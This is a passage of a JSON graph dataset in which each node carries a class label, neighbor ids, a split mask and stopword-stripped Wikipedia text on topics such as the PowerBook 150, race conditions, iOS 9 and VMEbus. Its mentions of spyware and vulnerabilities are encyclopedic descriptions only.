    "text": "PowerBook_150:powerbook 150 powerbook 150 laptop personal computer created apple computer inc. introduced july 13 1994 released july 18 1994 last member powerbook 100 series use original case design affordable series introduced priced 1,450 1,600 also last consumer model 8 mhz faster predecessor powerbook 145b lacked adb port used lower-quality passive matrix display contemporary offerings reduce price also lacked external monitor support like duos powerbook 100 150 single serial printer port however third party adapter available use optional modem slot though used 140 case design internals based powerbook duo 230 actually similar features powerbook 190 used powerbook 5300 case design notably new logicboard design allowed 100 series powerbook use 14 mb ram first time well first macintosh ever use less expensive larger ide drives formatting required unique software application limiting selection compatible drives also first 100 series include lithium-ion backup battery preserve ram contents battery replaced last powerbook model include trackball however like 145b replaced 150 could used scsi disk mode unlike duo 190 5300 hd target mode implemented",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      6896,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6037,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 6184,
    "label": 4,
    "text": "Race_condition:race condition race condition race hazard behavior electronics software system system substantive behavior dependent sequence timing uncontrollable events becomes bug one possible behaviors undesirable term race condition already use 1954 example david a. huffman doctoral thesis synthesis sequential switching circuits race conditions occur especially logic circuits multithreaded distributed software programs typical example race condition may occur logic gate combines signals traveled along different paths source inputs gate change slightly different times response change source signal output may brief period change unwanted state settling back designed state certain systems tolerate glitches output functions clock signal systems contain memory example system rapidly depart designed behaviour effect temporary glitch becomes permanent glitch consider example two-input gate fed logic signal one input negation another input theory output never true however changes value take longer propagate second input first changes false true brief period ensue inputs true gate output also true design techniques karnaugh maps encourage designers recognize eliminate race conditions cause problems often logic redundancy added eliminate kinds races well problems logic elements enter metastable states create problems circuit designers critical race condition occurs order internal variables changed determines eventual state state machine end non-critical race condition occurs order internal variables changed determine eventual state state machine end static race condition occurs signal complement combined together dynamic race condition occurs results multiple transitions one intended due interaction gates eliminated using two levels gating essential race condition occurs input two transitions less total feedback propagation time sometimes cured using inductive delay line elements effectively increase time duration input signal race conditions arise software application depends sequence timing processes threads operate properly electronics critical race conditions result invalid execution bugs critical race conditions often happen processes threads depend shared state operations upon shared states critical sections must mutually exclusive failure obey rule opens possibility corrupting shared state concept called data race type race condition data races important parts various formal memory models notably memory model defined c11 c++11 standards specify c c++ program containing data race undefined behavior race conditions reputation difficult reproduce debug since end result nondeterministic depends relative timing interfering threads problems occurring production systems therefore disappear running debug mode additional logging added attaching debugger often referred heisenbug therefore better avoid race conditions careful software design rather attempting fix afterwards simple example let us assume two threads want increment value global integer variable one ideally following sequence operations would take place case shown final value 2 expected however two threads run simultaneously without locking synchronization outcome operation could wrong alternative sequence operations demonstrates scenario case final value 1 instead expected result 2 occurs increment operations mutually exclusive mutually exclusive operations interrupted accessing resource memory location regard data races subset race conditions precise definition data race specific formal concurrency model used typically refers situation memory operation one thread could potentially attempt access memory location time memory operation another thread writing memory location context dangerous implies data race different race condition possible nondeterminism due timing even program without data races example program memory accesses use atomic operations dangerous many platforms two threads write memory location time may possible memory location end holding value arbitrary meaningless combination bits representing values thread attempting write could result memory corruption resulting value one neither thread attempted write sometimes called 'torn write similarly one thread reads location another thread writing may possible read return value arbitrary meaningless combination bits representing value memory location held write bits representing value written many platforms special memory operations provided simultaneous access cases typically simultaneous access using special operations safe simultaneous access using memory operations dangerous sometimes special operations safe simultaneous access called atomic synchronization operations whereas ordinary operations unsafe simultaneous access called data operations probably term data race many platforms race condition involving synchronization operations race may nondeterministic otherwise safe data race could lead memory corruption undefined behavior precise definition data race differs across formal concurrency models matters concurrent behavior often non-intuitive formal reasoning sometimes applied c++ standard draft n4296 2014-11-19 defines data race follows section 1.10.23 page 14 two actions potentially concurrent execution program contains data race contains two potentially concurrent conflicting actions least one atomic neither happens except special case signal handlers described omitted data race results undefined behavior parts definition relating signal handlers idiosyncratic c++ typical definitions data race paper detecting data races weak memory systems provides different definition two memory operations conflict access location least one write operation ... two memory operations x sequentially consistent execution form race 〈x y〉 iff x conflict ordered hb1 relation execution race 〈x y〉 data race iff least one x data operation two memory operations accessing location one write hb1 relation defined elsewhere paper example typical happens-before relation intuitively prove situation one memory operation x guaranteed executed completion another memory operation begins say x happens-before neither x happens-before happens-before x say x ordered hb1 relation clause ... ordered hb1 relation execution intuitively translated ... x potentially simultaneous paper considers dangerous situations least one memory operations data operation parts paper paper also defines class synchronization operations safe potentially simultaneous use contrast data operations java language specification provides different definition two accesses reads writes variable said conflicting least one accesses write ... program contains two conflicting accesses §17.4.1 ordered happens-before relationship said contain data race ... data race cause incorrect behavior returning wrong length array critical difference c++ approach java approach c++ data race undefined behavior whereas java data race merely affects inter-thread actions means c++ attempt execute program containing data race could still adhering spec crash could exhibit insecure bizarre behavior whereas java attempt execute program containing data race may produce undesired concurrency behavior otherwise assuming implementation adheres spec safe important facet data races contexts program free data races guaranteed execute sequentially consistent manner greatly easing reasoning concurrent behavior program formal memory models provide guarantee said exhibit sc drf sequential consistency data race freedom property approach said achieved recent consensus presumably compared approaches guarantee sequential consistency cases approaches guarantee example java guarantee directly specified program correctly synchronized sequentially consistent executions free data races program correctly synchronized executions program appear sequentially consistent §17.4.3 extremely strong guarantee programmers programmers need reason reorderings determine code contains data races therefore need reason reorderings determining whether code correctly synchronized determination code correctly synchronized made programmer need worry reorderings affect code program must correctly synchronized avoid kinds counterintuitive behaviors observed code reordered use correct synchronization ensure overall behavior program correct however use allow programmer reason possible behaviors program simple way behavior correctly synchronized program much less dependent possible reorderings without correct synchronization strange confusing counterintuitive behaviors possible contrast draft c++ specification directly require sc drf property merely observes exists theorem providing note shown programs correctly use mutexes memory_order_seq_cst operations prevent data races use synchronization operations behave operations executed constituent threads simply interleaved value computation object taken last side effect object interleaving normally referred “ sequential consistency ” however applies data-race-free programs data-race-free programs observe program transformations change single-threaded program semantics fact single-threaded program transformations continue allowed since program behaves differently result must perform undefined operation.— end note note c++ draft specification admits possibility programs valid use synchronization operations memory_order memory_order_seq_cst case result may program correct guarantee sequentially consistency provided words c++ correct programs sequentially consistent approach thought give c++ programmers freedom choose faster program execution cost giving ease reasoning program various theorems often provided form memory models provide sc drf guarantees given various contexts premises theorems typically place constraints upon memory model therefore upon implementation also upon programmer say typically case programs meet premises theorem could guaranteed execute sequentially consistent manner drf1 memory model provides sc drf allows optimizations wo weak ordering rcsc release consistency sequentially consistent special operations vax memory model data-race-free-0 memory models plpc memory model provides sc drf allows optimizations tso total store order pso pc processor consistency rcpc release consistency processor consistency special operations models drfrlx provides sketch sc drf theorem presence relaxed atomics many software race conditions associated computer security implications race condition allows attacker access shared resource cause actors utilize resource malfunction resulting effects including denial service privilege escalation specific kind race condition involves checking predicate e.g authentication acting predicate state change time check time use kind bug exists security-sensitive code security vulnerability called time-of-check-to-time-of-use tocttou bug created race conditions also intentionally used create hardware random number generators physically unclonable functions pufs created designing circuit topologies identical paths node relying manufacturing variations randomly determine paths complete first measuring manufactured circuit specific set race condition outcomes profile collected circuit kept secret order later verify circuit identity two programs may collide attempts modify access file system result data corruption privilege escalation file locking provides commonly used solution cumbersome remedy involves organizing system way one unique process running daemon like exclusive access file processes need access data file via interprocess communication one process requires synchronization process level different form race condition exists file systems unrelated programs may affect suddenly using available resources disk space memory space processor cycles software carefully designed anticipate handle race situation may become unpredictable risk may overlooked long time system seems reliable eventually enough data may accumulate enough software may added critically destabilize many parts system example occurred near loss mars rover spirit long landing solution software request reserve resources need beginning task request fails task postponed avoiding many points failure could occurred alternatively points equipped error handling success entire task verified afterwards continuing common approach simply verify enough system resources available starting task however may adequate complex systems actions running programs unpredictable networking consider distributed chat network like irc user starts channel automatically acquires channel-operator privileges two users different servers different ends network try start same-named channel time user respective server grant channel-operator privileges user since neither server yet received server signal allocated channel problem largely solved various irc server implementations case race condition concept shared resource covers state network channels exist well users started therefore privileges server freely change long signals servers network changes update conception state network however latency across network makes possible kind race condition described case heading race conditions imposing form control access shared resource—say appointing one server control holds privileges—would mean turning distributed network centralized one least one part network operation race conditions also exist computer program written non-blocking sockets case performance program dependent speed network link software flaws life-critical systems disastrous race conditions among flaws therac-25 radiation therapy machine led death least three patients injuries several another example energy management system provided ge energy used ohio-based firstenergy corp among power facilities race condition existed alarm subsystem three sagging power lines tripped simultaneously condition prevented alerts raised monitoring technicians delaying awareness problem software flaw eventually led north american blackout 2003 ge energy later developed software patch correct previously undiscovered error neuroscience demonstrating race conditions occur mammal rat brains well many software tools exist help detect race conditions software largely categorized two groups static analysis tools dynamic analysis tools thread safety analysis static analysis tool annotation-based intra-procedural static analysis originally implemented branch gcc reimplemented clang supporting pthreads dynamic analysis tools include several benchmarks designed evaluate effectiveness data race detection tools",
    "neighbors": [
      9224,
      7699,
      8726,
      10781,
      7218,
      2113,
      8773,
      2558,
      6228,
      602,
      2140,
      4194,
      5223,
      8810,
      4205,
      1137,
      6774,
      7802,
      6269,
      3197,
      5251,
      7313,
      6815,
      2210,
      5798,
      1193,
      5805,
      7341,
      187,
      4286,
      2243,
      5325,
      4308,
      2262,
      2264,
      731,
      2281,
      8946,
      9466,
      6909,
      8447,
      10495,
      779,
      6926,
      785,
      2322,
      7446,
      3863,
      2345,
      815,
      5433,
      5948,
      10048,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      2379,
      3914,
      2394,
      11618,
      9060,
      2409,
      6027,
      3990,
      1435,
      9126,
      4009,
      9646,
      1967,
      10675,
      7097,
      1480,
      3529,
      2008,
      5090,
      2536,
      4592,
      508,
      9214
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6185,
    "label": 7,
    "text": "Sixa:sixa sixa inc. cloud-computing startup company lets users on-demand access personal virtual computer company founded september 2015 headquartered san francisco california company offers custom computers developers designers gamers relevant preinstalled software service allows users access powerful cloud computer device eliminates need buy new hardware computational power needed service available windows mac os x android operating systems sixa backed combinator join summer 2016 batch july 2016 raised 261,000 funding startupbootcamp istanbul ws investments combinator starting december 2016 sixa service publicly available usage part launch company raised 3.5 million seed investment round led tandem capital",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 6186,
    "label": 2,
    "text": "IOS_9:ios 9 ios 9 ninth major release ios mobile operating system developed apple inc. successor ios 8 announced company worldwide developers conference june 8 2015 released september 16 2015 succeeded ios 10 september 13 2016. ios 9 incorporated many feature updates built-in apps notably notes received ability draw sketches different tools image insertion prominent visual appearance website links map locations advanced list formatting all-new apple news app aggregates articles different sources apple maps received mass transit support although limited number locations launch major new system updates include proactivity siri advanced search combined make operating system contextually aware information time location provide user information ahead time searching proactive intelligence display instant results widget-like format including weather sports news ios 9 also added multiple forms multitasking ipad ios 9.3 apple added night shift mode changes color device display warmer less blue light shade prevent potential negative screen effect users circadian rhythms additionally ios 9 brought new user experience functions including quick actions peek pop based touch-sensitive display technology iphone 6s quick actions shortcuts home screen app icons users preview peek content without moving away current screen enter pop previewed content full view reception ios 9 positive critics praised proactivity siri making notification center central location information potential future updates improve functionality new multitasking features ipad complimented drawing photo insertion notes app however apple news criticized low number decent-looking articles apple maps criticized limited geographical availability mass transit support five days release apple announced ios 9 installed 50 active ios devices apple described fastest adoption rate ever new operating system ios 9 introduced apple worldwide developers conference june 8 2015 first beta made available registered developers keynote public beta made available july marked first time general public able test new versions ios official release eddy cue apple senior vice president internet software services telling fast company public beta program started maps referring company apple maps launch significant issues early days ios 9 officially released september 16 2015. ios 9.0.1 released september 23 2015 first update ios 9 fixed playback issues alarms timers made setup assistant work properly resolved distortion paused frames video playback photos safari ios 9.0.2 released september 30 2015 fix multiple bugs including lock screen bypass issue ios 9.1 released october 21 2015 update included support ipad pro apple pencil 4th-generation apple tv also added support 150 new emoji part unicode 7.0 8.0 emoji standards live photos intelligently sense user raises lowers phone n't record movements bug fixes improvements security performance also included ios 9.2 released december 8 2015 update included arabic language support siri iphone support apple lightning-to-sd-card reader accessory lets users transfer photos videos sd card commonly used dslr cameras iphone without need computer ios 9.2 also included new visual download indicator apple music support wi-fi calling users along bug fixes stability improvements ios 9.2.1 released january 19 2016 bug fixes february 18 2016 second version ios 9.2.1 released fix bricking issue impacted iphones touch id sensors repaired third-party ios 9.3 released march 21 2016 new 3d touch quick actions several apple built-in apps night shift mode notes password protection touch id news better personalized recommendations support in-line video iphone landscape view health activity view carplay updates apple music apple maps new languages siri multi-user mode ipad education support pairing multiple apple watches one iphone wi-fi calling verizon users support playing videos encoded dolby digital plus audio streams select lightning-equipped ios devices well major bug fixes ios 9.3.1 released march 31 2016 fix issue caused apps become unresponsive crash tapping links ios 9.3.2 released may 16 2016 update made possible use night shift low power mode simultaneously previously possible also fixed bluetooth issue iphone se however ios 9.3.2 bricked 9.7-inch ipad pros preventing used apple pulled update ipad pro may 20 2016 re-released 9.3.2 device june 2 2016 fixing issue ios 9.3.3 released july 18 2016 bug fixes performance improvements ios 9.3.4 released august 4 2016 fix memory corruption issue could enable app execute arbitrary code kernel privileges update consequently patched ios jailbreaking method used chinese programming group pangu team ios 9.3.5 released august 25 2016 fix three critical security vulnerabilities user clicked malicious link jailbreak enabled device installed spyware pegasus intercept collect information device well activate microphone track device location spyware used strong encryption avoid detection ios 9.3.6 released july 22 2019 address issue could impact gps location performance could cause system date time incorrect update available iphone 4s cellular models ipad mini 1st generation ipad 2 ipad 3rd generation iphone 6s iphone 6s plus touch-sensitive display feature called 3d touch incorporated ios 9 similar force touch found trackpad apple macbook computers quick actions shortcuts added apps support 3d touch feature triggered pressing slightly harder app icon also introduces actions known peek pop lets users firmly hold preview peek kind content hovering window optionally apply pressure enter pop content full view taptic engine iphone 6s provides haptic feedback time users press screen harder ios 9 comes two important battery-saving updates phone placed face-down screen light upon receiving notifications apple also added low power mode modifies amount energy dedicated background services animations example background app refresh push email paused low power mode phone reaches 20 battery level users automatically prompted turn low power mode changes color battery icon top row status bar screen yellow battery goes higher 80 level low power mode automatically turns back san francisco new system font replaced helvetica neue system typeface ios ios 9 added new battery widget notification center displayed battery life charging status connected bluetooth device shift button inactive lowercase letters displayed keyboard instead all-caps representation previous ios versions ios 9 smaller update ios 8 requiring 1.3 gb space compared 4.58 gb ios 8 additionally ios 9 includes option temporarily delete apps allow update install update installed apps automatically restored ios 9 also features app thinning functionality whereby necessary assets needed run apps individual device downloaded rather entire app potentially saving space ios 9 adds number features ipad improve productivity include slide split screen picture picture enhanced multitasking similar experience found os x el capitan slide allows user pull second app swipe right edge display app takes 1/3 screen sticks right side screen interactivity within full-screen app disabled left inactive background feature allows users perform quick tasks dismiss app user taps handle next slide window extends window towards left screen user enters split screen allows interact two apps simultaneously side-by-side 50/50 split users also switch another app either slide mode split screen view pulling handle top either app selecting another app list replace existing one picture picture mode allows users minimize facetime calls supported videos smaller window continue watching tasks ipad split screen multitasking feature available ipad air 2 ipad mini 4 ipad pro slide picture picture features available ipad air ipad air 2 ipad mini 2 newer ipad pro banner notifications tapped causing another app open back button top-left corner screen added bringing user back previous app night shift display mode introduced ios 9.3 mode shifts colors device display warmer similar f.lux popular program microsoft windows apple macos computers enabled uses device clock geographic location determine turn feature optionally user set manual schedule schedule ease access new night shift toggle control center settings night shift located display brightness settings app top enabling feature setting schedule user also set warmth display despite introduced ios 9.3 march 2016 n't possible use night shift low power mode simultaneously release ios 9.3.2 two months later night shift requires 64-bit processor found apple a7 newer chips means older ios devices including iphone 4s iphone 5 iphone 5c ipad 2 ipad 3 ipad 4 first-generation ipad mini ipod touch 5 receive night shift mode ios 9 includes performance speed improvements thanks expanded use metal api metal introduced ios 8 previously limited game developers ios 9 use metal expanded let handle many core user interface elements graphics intelligence one main features ios 9 consisting newly integrated siri search previously known spotlight well proactivity throughout operating system ios aware contextual information time location proactively provides user may need advance save time effort typing search also improved display instant answers at-a-glance widget-like format similar provided siri interface search display current weather sports scores news search screen proactive suggestions accessed either pulling notifications window safari web browser search bar left home screen intelligence also extends apps instance mail events automatically added calendar details found message content likely additional recipients suggested message composition siri also aware currently screen engaged holding home button ios 9 introduces multiple security enhancements introduces 6-digit passcode default extra two digits previous 4-digit default well support two-factor authentication original ios 9 release september 2015 fixed security issue within previous ios versions flaw allowed anyone within range airdrop user install malware target device tweak ios settings exploit would still work victim rejected incoming airdrop file settings app ios 9 search bar makes easier find settings options user also options notifications grouped app came ability turn shake undo ipad two-finger drag keyboard moves cursor freely like traditional trackpad making positioning cursor selecting text easier keyboard-to-trackpad feature also extended iphone 6s 6s plus users 3d touch force press keyboard enable trackpad also ipad shortcut bar added cut copy paste undo redo functions folders display 16 apps per page 4-by-4 arrangement compared 9 iphone allowing increased total 240 apps single folder ios 9 introduced wi-fi assist feature default automatically switches phone cellular data wi-fi connection spotty whenever user presented flight information user click link view preview flight ios 9.3 pdfs saved ibooks application via safari itunes synced icloud ios 9 setting enables icloud drive app home screen icloud drive lets user save browse files folders icloud health app introduced ios 8 received landscape mode iphone also added support reproductive health uv exposure water intake sedentary state data types ios 9.3 also tracks sleep exercise weight apple watch messages app allows user search text text highlighted scrolled apple maps adds support transit directions baltimore berlin chicago london los angeles mexico city new york city paris philadelphia san francisco toronto washington d.c. along 300 locations china maps app also enhanced location details including nearby feature recommends shops restaurants places drink close proximity user places serving food users specify exactly type food want ios 9 includes new apple news app replacing newsstand app aggregates news different sources similar style flipboard app features mobile-formatted layout loads quickly informative animations full-bleed images additionally news supports rss feeds safari web browser launch news app available united states expanded united kingdom australia ios 9.1 update march 2016 apple opened news platform news agencies including independent bloggers notes app received number enhancements ios 9 including ability draw sketches number different tools including ruler straight lines images also added links websites map locations get prominent visual appearance added notes ipad iphone landscape mode notes range color options drawing well eraser advanced formatting options including checked bulleted dashed numbered lists app also supports icloud allows easy folder creation secure notes feature introduced ios 9.3 lets ios user protect notes either passcode touch id photos app ios 9 included improved scrubber bar photo viewer screenshots selfies albums ability hold select multiple photos easily without delete individually also allows user hide sensitive material new hide option app also allows user pinch-to-zoom playing video release ios 9 safari web browser allows third-party content blocking apps safari also allows users customize appearance reader mode options font background color days release ios 9 ad blocking software topped app store charts marco arment developer peace app saying web advertising behavioral tracking control ... 're unacceptably creepy bloated annoying insecure 're getting worse alarming pace passbook application renamed wallet ios 9 includes many new changes support store loyalty cards gift cards discover credit/debit cards apple pay uk wallet app also accessed lock screen ios 9.3 music api allows developers integrate apps apple music streaming service ios 9 received mostly positive reviews dan seifert verge praised improvements proactivity siri highlighting notification drop-down contains information user needs although pointed google google microsoft cortana personal assistants offer similar services sometimes better varied ways achieving results improvements ios lay foundation even capabilities future chris velazco engadget liked small thoughtful design changes impressed new multitasking features ipad referring split screen lovely little feature however criticize low number decent-looking articles apple news writing 'll notice discrepancy articles handled -- formatted text white background outlet logo top also noted limited number locations apple maps launch supported mass transit directions matt swider techradar wrote siri proactivity lists robust enjoyed notifications sorted chronologically rather app samuel gibbs guardian welcomed changes built-in apps drawing photo insertion notes unknown number identification emails phone siri automatically launching music app upon plugging headphones also praised updates keyboard calling much easier use apple facing 5 million lawsuit allegedly slowing iphone 4s ios 9 according lawsuit ios 9 update slowed iphone 4s point phone unusable performance sluggish apple knew fact planned obsolescence september 21 2015 apple announced ios 9 installed 50 active ios devices measured app store according apple fastest adoption rate ever new operating system february 2016 news outlets reported users updated ios 9 particular device components repaired third-party notably touch id fingerprint recognition sensor rendered phone bricked issue named error 53 according ifixit limited iphone 6 6 plus devices apple stated protect fingerprint data using secure enclave uniquely paired touch id sensor iphone serviced authorised apple service provider apple retail store changes affect touch id sensor pairing re-validated ... check ensures device ios features related touch id remain secure without unique pairing malicious touch id sensor could substituted thereby gaining access secure enclave ios detects pairing fails touch id including apple pay disabled device remains secure apple released new version ios 9.2.1 later february fix issue february 2016 bug discovered could permanently disable 64-bit devices bug setting time 1 january 1970 would cause device get stuck reboot process ios 9.3 released march 21 2016 fixed issue may 2016 apple released ios 9.3.2 update followed reports bricked 9.7-inch ipad pros connect itunes message error 56 message itunes could n't restore tablet apple temporarily stopped offering 9.3.2 update re-release version june 2016 fixed issue release ios 9.3.3 july 2016 followed reports ibooks store crashed however apple explained august timing coincidence ibooks app crash result server issue software update release ios 9.3.5 august 2016 fixed three critical security vulnerabilities vulnerabilities could exploited silently enable jailbreak allow malicious installation spyware called pegasus pegasus could intercept read text messages emails track calls trace phone location activate microphone gather information apps including limited imessage gmail viber facebook whatsapp telegram skype discovery vulnerabilities dated 10 days 9.3.5 update released arab human rights defender ahmed mansoor received suspicious text message link sent citizen lab investigation ensued collaboration lookout revealed mansoor clicked link would jailbroken phone implanted spyware citizen lab linked attack israeli surveillance company known nso group sells pegasus governments lawful interception regarding widespread issue lookout explained blog post believe spyware wild significant amount time based indicators within code pointed code shows signs kernel mapping table values way back ios 7 news spyware received significant media attention particularly called sophisticated smartphone attack ever first time iphone history remote jailbreak exploit detected july 2017 information critical wi-fi security vulnerability affecting one billion ios android devices published issue named broadpwn allows attacker remotely take control nearby vulnerable smartphones turn affected devices rogue access points spreading infection nearby devices apple released security patch issue part ios 10.3.3 update though older devices running ios 9 including ipad 2 iphone 4s left without available update causing concerns safety product schools release apple drop support ios devices devices supporting ios 8 also able run ios 9",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      5181,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      1134,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      6797,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      8014,
      4957,
      6495,
      9063,
      2922,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      3483,
      5536,
      2979,
      9123,
      11171,
      8109,
      7096,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      8172,
      2542,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 6187,
    "label": 3,
    "text": "VMEbus:vmebus vmebus versa module europa versa module eurocard bus computer bus standard originally developed motorola 68000 line cpus later widely used many applications standardized iec ansi/ieee 1014-1987 physically based eurocard sizes mechanicals connectors din 41612 uses signalling system eurocard define first developed 1981 continues see widespread use today 1979 development motorola 68000 cpu one engineers jack kister decided set creating standardized bus system 68000-based systems motorola team brainstormed days select name versabus versabus cards large used edge connectors products adopted including ibm system 9000 instrument controller automatix robot machine vision systems kister later joined john black refined specifications created versamodule product concept young engineer working black julie keahey designed first versamodule card versabus adaptor module used run existing cards new versabus sven rau max loesel motorola-europe added mechanical specification system basing eurocard standard late standardization process result first known versabus-e later renamed vmebus versamodule eurocard bus although refer versa module europa point number companies involved 68000 ecosystem agreed use standard including signetics philips thomson mostek soon officially standardized iec iec 821 vmebus ansi ieee ansi/ieee 1014-1987 original standard 16-bit bus designed fit within existing eurocard din connectors however several updates system allow wider bus widths current vme64 includes full 64-bit bus 6u-sized cards 32-bit 3u cards vme64 protocol typical performance 40 mb/s associated standards added hot-swapping plug-and-play vme64x smaller 'ip cards plug single vmebus card various interconnect standards linking vme systems together late 1990s synchronous protocols proved favourable research project called vme320 vita standards organization called new standard unmodified vme32/64 backplanes new 2esst protocol approved ansi/vita 1.5 1999 years many extensions added vme interface providing 'sideband channels communication parallel vme examples ip module raceway interlink scsa gigabit ethernet vme64x backplanes pci express rapidio starfabric infiniband vmebus also used develop closely related standards vxibus vpx vmebus strong influence many later computer buses stebus architectural concepts vmebus based versabus developed late 1970s motorola motorola european microsystems group munich west germany proposed development versabus-like product line based eurocard mechanical standard demonstrate concept max loesel sven rau developed three prototype boards 1 68000 cpu board 2 dynamic memory board 3 static memory board named new bus versabus-e later renamed vme short versa module european lyman lym hevle vp motorola microsystems operation later founder vme marketing group subsequently renamed vme international trade association vita early 1981 motorola mostek signetics agreed jointly develop support new bus architecture companies early supporters 68000 microprocessor family john black motorola craig mackenna mostek cecil kaplinsky signetics developed first draft vmebus specification october 1981 system '81 trade show munich west germany motorola mostek signetics/philips thomson csf announced joint support vmebus also placed revision specification public domain august 1982 revision b vmebus specification published newly formed vmebus manufacturers group vita new revision refined electrical specifications signal line drivers receivers brought mechanical specification line developing iec 297 standard formal specification eurocard mechanical formats latter 1982 french delegation international electrotechnical commission iec proposed revision b vmebus international standard iec sc47b subcommittee nominated mira pauker philips france chairperson editorial committee thus formally starting international standardization vmebus march 1983 ieee microprocessor standards committee msc requested authorization establish working group could standardize vmebus us request approved ieee standards board p1014 working group established wayne fischer appointed first chairman working group john black served chairman p1014 technical subcommittee iec ieee vmebus manufacturers group vita distributed copies revision b comment received resulting requests changes document comments made clear time go past revision b december 1983 meeting held included john black mira pauker wayne fischer craig mackenna agreed revision c created take consideration comments received three organizations john black shlomo pri-tal motorola incorporated changes sources common document vmebus manufacturers group labelled document revision c.1 placed public domain ieee labelled p1014 draft 1.2 iec labelled iec 821 bus subsequent ballots ieee p1014 working group msc resulted comments required ieee p1014 draft updated resulted ansi/ieee 1014-1987 specification 1985 aitech developed contract us tacom first conduction-cooled 6u vmebus board although electrically providing compliant vmebus protocol interface mechanically board interchangeable use air-cooled lab vmebus development chassis late 1987 technical committee formed vita direction ieee create first military conduction-cooled 6u x 160mm fully electrically mechanically compatible vmebus board co-chaired dale young dy4 systems doug patterson plessey microsystems radstone technology ansi/ieee-1101.2-1992 later ratified released 1992 remains place conduction-cooled international standard 6u vmebus products 1989 john peters performance technologies inc. developed initial concept vme64 multiplexing address data lines a64/d64 vmebus concept demonstrated year placed vita technical committee 1990 performance enhancement vmebus specification 1991 par project authorization request p1014r revisions vmebus specification granted ieee ray alderman technical director vita co-chaired activity kim clohessy dy-4 systems end 1992 additional enhancements vmebus a40/d32 locked cycles rescinding dtack* autoslot-id auto system controller enhanced din connector mechanicals required work complete document vita technical committee suspended work ieee sought accreditation standards developer organization sdo american national standards institute ansi original ieee par p1014r subsequently withdrawn ieee vita technical committee returned using public domain vmebus c.1 specification base-level document added new enhancements enhancement work undertaken entirely vita technical committee resulted ansi/vita 1-1994 tremendous undertaking document editing accomplished kim clohessy dy-4 systems technical co-chair activity great help frank hom created mechanical drawings exceptional contributions chapter editor additional enhancements proposed vme64 subcommittee placed vme64 extensions document two activities began late 1992 blli vmebus board-level live insertion specifications vsli vmebus system-level live insertion fault tolerance 1993 new activities began base-vme architecture involving implementation high-speed serial parallel sub-buses use i/o interconnections data mover subsystems architectures used message switches routers small multiprocessor parallel architectures vita application recognition accredited standards developer organization ansi granted june 1993 numerous documents including mezzanine p2 serial bus standards placed vita public domain administrator technologies detailed timeline vmebus history found vita website many ways vmebus equivalent analogous pins 68000 run onto backplane however one key features 68000 flat 32-bit memory model free memory segmentation anti-features result vme 68000-like 68000 generic enough make issue cases like 68000 vme uses separate 32-bit data address buses 68000 address bus actually 24-bit data bus 16-bit although 32/32 internally designers already looking towards full 32-bit implementation order allow bus widths vme uses two different eurocard connectors p1 p2 p1 contains three rows 32 pins implementing first 24 address bits 16 data bits control signals p2 contains one row includes remaining 8 address bits 16 data bits bus controlled set nine lines known arbitration bus communications controlled card slot one eurocard chassis known arbiter module two arbitration modes supported round robin prioritized regardless arbitration mode card attempt become bus master holding one four bus request lines low round robin arbitration arbiter cycles amongst bus request lines br0-br3 determine potentially simultaneous requesters granted bus priority arbitration br0-br3 use fixed priority scheme br0 lowest br3 highest arbiter grant bus highest priority requestor arbiter determined bus requests grant asserts corresponding bus grant line bg0 bg3 level bus mastership two masters simultaneously request bus using br line bus grant daisy-chain effectively breaks tie granting bus module closest arbiter master granted bus indicate bus use asserting bus busy bbsy* point master gained access bus write data card drives address address modifier data onto bus drives address strobe line two data strobe lines low indicate data ready drives write pin indicate transfer direction two data strobes *lword line cards indicate data width 8 16 32 bits 64 vme64 card bus address reads data pulls data transfer acknowledge low line transfer complete transfer complete pull bus error line low reading data essentially controlling card drives address bus leaves data bus tri-stated drives read pin slave card drives read data onto data bus drives data strobe pins low data ready signalling scheme asynchronous meaning transfer tied timing bus clock pin unlike synchronous buses pci block transfer protocol allows several bus transfers occur single address cycle block transfer mode first transfer includes address cycle subsequent transfers require data cycles slave responsible ensuring transfers use successive addresses bus masters release bus two ways release done rwd master releases bus completes transfer must re-arbitrate bus every subsequent transfer release request ror master retains bus continuing assert bbsy* transfers ror allows master retain control bus bus clear bclr* asserted another master wishes arbitrate bus thus master generates bursts traffic optimize performance arbitrating bus first transfer burst decrease transfer latency comes cost somewhat higher transfer latency masters address modifiers used divide vme bus 